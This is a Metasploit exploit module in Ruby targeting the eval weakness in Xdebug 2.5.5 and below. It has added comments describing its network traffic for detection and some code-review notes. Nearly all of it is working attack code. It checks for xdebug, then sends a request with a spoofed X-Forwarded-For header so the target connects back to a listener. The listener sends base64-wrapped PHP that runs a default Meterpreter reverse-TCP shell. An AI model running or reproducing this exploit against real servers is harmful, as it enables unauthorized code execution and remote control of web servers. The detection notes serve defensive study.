##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the xdebug remote-debugging "eval" weakness (Xdebug 2.5.5
# and below, per the Description string). What this module puts on the wire,
# which is what a defender would key detection on:
#   * check   - an HTTP GET to PATH with a random XDEBUG_SESSION_START query value
#   * exploit - a listener on SRVHOST:SRVPORT (default 9000), then an HTTP GET to
#               PATH carrying an XDEBUG_SESSION cookie and an X-Forwarded-For
#               header set to LHOST; the target is expected to connect back to
#               the listener, which answers with one "eval -i 1 -- <base64>" line.
# Egress from a web server to 9000/tcp on an external host right after such a
# request is therefore a strong indicator of this activity.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): no Rex::Proto::Http constant is referenced directly in this
  # file; this include may be unnecessary - confirm before removing.
  include Rex::Proto::Http

  # Module metadata and datastore options.
  #
  # Registers PATH (target script, default "/index.php"), SRVHOST/SRVPORT (the
  # address the target is expected to connect back to; SRVPORT defaults to 9000)
  # and RPORT (80). Stance is Aggressive, so the framework runs the payload
  # handler after +exploit+ returns.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'xdebug Unauthenticated OS Command Execution',
        'Description' => %q{
          Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
          This allows the attacker to execute arbitrary php code as the context of the web user.
        },
        'DisclosureDate' => '2017-09-17',
        'Author' => [
          'Ricter Zheng', # Discovery https://twitter.com/RicterZ
          'Shaksham Jaiswal', # MinatoTW
          'Mumbai' # Austin Hudson
        ],
        'References' => [
          ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
          ['URL', 'http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'php',
        'Arch' => [ARCH_PHP],
        'DefaultTarget' => 0,
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
        },
        'Payload' => {
          'DisableNops' => true,
        },
        'Targets' => [[ 'Automatic', {} ]],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
      OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
      OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
      Opt::RPORT(80),
    ])
  end

  # Probe for xdebug: GET PATH with a random XDEBUG_SESSION_START value and look
  # for "XDEBUG" (case-insensitive) anywhere in the stringified response headers.
  #
  # @return [CheckCode] Detected when the header match succeeds, Safe when the
  #   request completes without a match (or no response object is returned),
  #   Unknown when the connection fails with Rex::ConnectionError. Any other
  #   exception propagates to the framework.
  def check
    begin
      res = send_request_cgi({
        'uri' => datastore["PATH"],
        'method' => 'GET',
        'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
        }
      })
      vprint_status "Request sent\n#{res}"
      # Matching on the whole header blob, not a specific header name: any
      # header whose name or value contains "xdebug" counts.
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    rescue Rex::ConnectionError
      return CheckCode::Unknown
    end
  end

  # Deliver the payload.
  #
  # A listener thread accepts a single TCP connection on SRVHOST:SRVPORT, reads
  # up to 1024 bytes from it, writes +cmd1+ (an "eval -i 1 -- <base64>" line
  # terminated by a NUL byte, where the base64 wraps a PHP eval of the
  # base64-encoded payload) and closes both sockets. The main thread then sends
  # the triggering GET and returns without joining the listener.
  #
  # NOTE(review): if +server.accept+ or +client.recv+ raises, the +ensure+ only
  # exits the thread; neither +server+ nor +client+ is closed on that path, so
  # the listening socket can linger until GC. +webserver.exit+ called from inside
  # the thread is equivalent to Thread.current.exit, and the second call in
  # +ensure+ is redundant.
  # NOTE(review): "#{payload.encoded}" and "#{lhost}" interpolate values that are
  # presumably already strings; +.to_s+ would state the intent more plainly.
  def exploit
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    # Inner PHP: eval(base64_decode("<payload>")); the whole line is then
    # base64-encoded again and NUL-terminated for the debugger protocol.
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"
    webserver = Thread.new do
      begin
        server = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['SRVPORT'],
          'LocalHost' => datastore['SRVHOST'],
          # Framework/module context handed to Rex (presumably for socket
          # bookkeeping - not verified here).
          'Context' => {
            'Msf' => framework,
            'MsfExploit' => self
          }
        )

        # Blocks until the target connects back; only one connection is served.
        client = server.accept
        print_status("Waiting for client response.")
        data = client.recv(1024)
        print_status("Receiving response")
        vprint_line(data)
        print_status("Shell might take upto a minute to respond.Please be patient.")
        print_status("Sending payload of size #{cmd1.length} bytes")
        client.write(cmd1)
        client.close
        server.close
        webserver.exit
      ensure
        webserver.exit
      end
    end
    # Trigger request. NOTE(review): presumably xdebug reads X-Forwarded-For to
    # choose the debug-client address it connects back to - confirm against the
    # references; the XDEBUG_SESSION cookie value itself is random.
    send_request_cgi({
      'uri' => datastore['PATH'],
      'method' => 'GET',
      'headers' => {
        'X-Forwarded-For' => "#{lhost}",
        'Cookie' => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)
      }
    })
  end
end